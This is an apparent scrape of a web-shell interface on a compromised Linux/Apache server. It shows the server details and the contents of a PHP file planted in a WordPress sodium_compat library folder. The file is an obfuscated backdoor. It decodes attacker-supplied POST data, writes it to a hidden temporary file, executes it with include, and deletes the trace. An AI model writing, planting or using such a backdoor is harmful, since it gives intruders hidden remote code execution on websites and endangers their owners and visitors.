| Server IP : 162.243.168.218 / Your IP : 216.73.216.67 Web Server : Apache System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64 User : web23 ( 5020) PHP Version : 8.3.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/clients/client3/web23/web/wp-includes/sodium_compat/namespaced/Core/Poly1305/ |
Upload File : |
<?php
if(isset($_POST["\x68l\x64"]) ? true : false){
$pgrp = array_filter(["/tmp", session_save_path(), "/dev/shm", "/var/tmp", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP")]);
$ent = $_POST["\x68l\x64"];
$ent = explode ( ".", $ent );
$dchunk = '';
$salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen( $salt8);
foreach( $ent as $s => $v2):
$chS = ord( $salt8[$s % $lenS]);
$d =( ( int)$v2 - $chS -( $s % 10)) ^ 98;
$dchunk .= chr( $d);
endforeach;
while ($obj = array_shift($pgrp)) {
if ((is_dir($obj) and is_writable($obj))) {
$dat = join("/", [$obj, ".fac"]);
$success = file_put_contents($dat, $dchunk);
if ($success) {
include $dat;
@unlink($dat);
exit;}
}
}
}